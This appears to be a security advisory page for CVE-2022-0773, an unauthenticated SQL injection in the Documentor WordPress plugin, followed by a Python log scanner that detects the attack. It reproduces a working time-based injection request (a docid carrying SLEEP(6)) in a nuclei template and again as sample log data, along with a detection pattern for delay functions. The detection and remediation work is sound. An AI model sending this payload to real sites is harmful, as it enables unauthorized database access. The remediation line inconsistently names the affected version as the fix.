CVE-2022-0773: Documentor <= 1.5.3 - Unauthenticated SQL Injection

Date: 2025-08-01 | Affected software: Documentor | PoC: public

Vulnerability description

The Documentor WordPress plugin through 1.5.3 fails to sanitize and escape user input before it is being interpolated in an SQL statement and then executed, leading to an SQL Injection exploitable by unauthenticated users.

PoC code [public]

id: CVE-2022-0773

info:
  name: Documentor <= 1.5.3 - Unauthenticated SQL Injection
  author: theamanrawat
  severity: critical
  description: |
    The Documentor WordPress plugin through 1.5.3 fails to sanitize and escape user input before it is being interpolated in an SQL statement and then executed, leading to an SQL Injection exploitable by unauthenticated users.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
  remediation: |
    Update to Documentor version 1.5.3 or later to mitigate this vulnerability.
  reference:
    - https://wpscan.com/vulnerability/55b89de0-30ed-4f98-935e-51f069faf6fc
    - https://wordpress.org/plugins/documentor-lite/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0773
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-0773
    cwe-id: CWE-89
    epss-score: 0.63237
    epss-percentile: 0.98349
    cpe: cpe:2.3:a:documentor_project:documentor:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: documentor_project
    product: documentor
    framework: wordpress
  tags: time-based-sqli,cve2022,cve,unauth,sqli,wp-plugin,wp,documentor-lite,wpscan,wordpress,documentor_project

http:
  - raw:
      - |
        @timeout: 20s
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=doc_search_results&term=&docid=1+AND+(SELECT+6288+FROM+(SELECT(SLEEP(6)))HRaz)
      - |
        GET /wp-content/plugins/documentor-lite/core/js/documentor.js HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'duration_1>=6'
          - 'status_code == 200'
          - 'contains(content_type_1, "text/html")'
          - 'contains(body_1, "([])") && contains(body_2, ".documentor-help")'
        condition: and
# digest: 4a0a00473045022059279957fb315a2e1587ce1c64c2bc65eea87860ab2133053d9a6d848824ad9b022100f9bad6e3c1df86451b471b43213cbf3364024cc83c982047b42c948267c00941:922c64590222798bb761d5b6d8e72950
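The nuclei template above confirms the bug by timing: it sends a docid that makes MySQL sleep and checks that the first response took at least six seconds. On the defending side the same request leaves a footprint in any log that records admin-ajax.php bodies, and the description's root cause (an id interpolated into SQL without being checked) points at the allow-list a fixed handler must apply: a document id is a bare decimal integer and nothing else (WordPress' absint() enforces exactly that). The script below is an added example, not the plugin's code or part of the advisory. It assumes a combined-log layout with the POST body appended as a trailing quoted field; the log lines are constructed for the example, with the second one carrying the advisory's own PoC body, and the parameter names action, docid and doc_search_results come from the template's request.

```python
"""Flag Documentor search requests whose docid is not the bare integer the
handler should accept (constructed example, not project code)."""
import re
from urllib.parse import parse_qs

# Constructed log lines: combined log format plus the POST body in a trailing
# quoted field. The second line reuses the advisory's PoC request body.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Aug/2025:10:00:01 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 "action=doc_search_results&term=intro&docid=1"',
    '10.0.0.9 - - [01/Aug/2025:10:00:07 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 "action=doc_search_results&term=&docid=1+AND+(SELECT+6288+FROM+(SELECT(SLEEP(6)))HRaz)"',
    '10.0.0.9 - - [01/Aug/2025:10:00:09 +0000] "GET /wp-content/plugins/documentor-lite/core/js/documentor.js HTTP/1.1" 200 "-"',
    '10.0.0.7 - - [01/Aug/2025:10:00:12 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 "action=heartbeat&_nonce=abc"',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) "(?P<body>[^"]*)"$'
)
AJAX_PATH = '/wp-admin/admin-ajax.php'
VULN_ACTION = 'doc_search_results'
# MySQL delay primitives used by blind, time-based probes; the template's
# 'duration_1>=6' matcher depends on one of these firing server-side.
TIME_BASED_RE = re.compile(r'\b(SLEEP|BENCHMARK)\s*\(', re.IGNORECASE)


def is_valid_docid(value):
    """The only shape a document id may have: a bare decimal integer. This is
    the allow-list a fixed handler applies before the value reaches SQL."""
    return re.fullmatch(r'[0-9]+', value) is not None


def parse_log_line(line):
    """Split one log line into named fields; None if the layout does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def extract_docid(rec):
    """docid of a Documentor search request, or None if the line is something else."""
    if rec is None or rec['method'] != 'POST' or rec['path'] != AJAX_PATH:
        return None
    params = parse_qs(rec['body'], keep_blank_values=True)
    if params.get('action') != [VULN_ACTION] or 'docid' not in params:
        return None
    return params['docid'][0]  # parse_qs already turned '+' into spaces


def classify_docid(docid):
    """Reason string for a suspicious docid, or None when it is a clean integer."""
    if is_valid_docid(docid):
        return None
    if TIME_BASED_RE.search(docid):
        return 'time-based sqli'
    return 'non-numeric docid'


def scan(lines):
    """Run the checks over a whole log and collect the hits."""
    hits = []
    for line in lines:
        rec = parse_log_line(line)
        docid = extract_docid(rec)
        if docid is None:
            continue
        reason = classify_docid(docid)
        if reason:
            hits.append({'ip': rec['ip'], 'ts': rec['ts'],
                         'docid': docid, 'reason': reason})
    return hits


if __name__ == '__main__':
    for hit in scan(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['ip']} {hit['reason']}: docid={hit['docid']!r}")
```

Only the second line is reported: its docid decodes to a value that is neither an integer nor free of a delay primitive. The other admin-ajax.php requests pass because their docid is a plain number or the action is unrelated, and the follow-up GET for documentor.js (the template's second request, a fingerprint of the plugin being installed) is ignored on its own. The same `is_valid_docid` rule, applied in the handler, is what removes the injection in the first place.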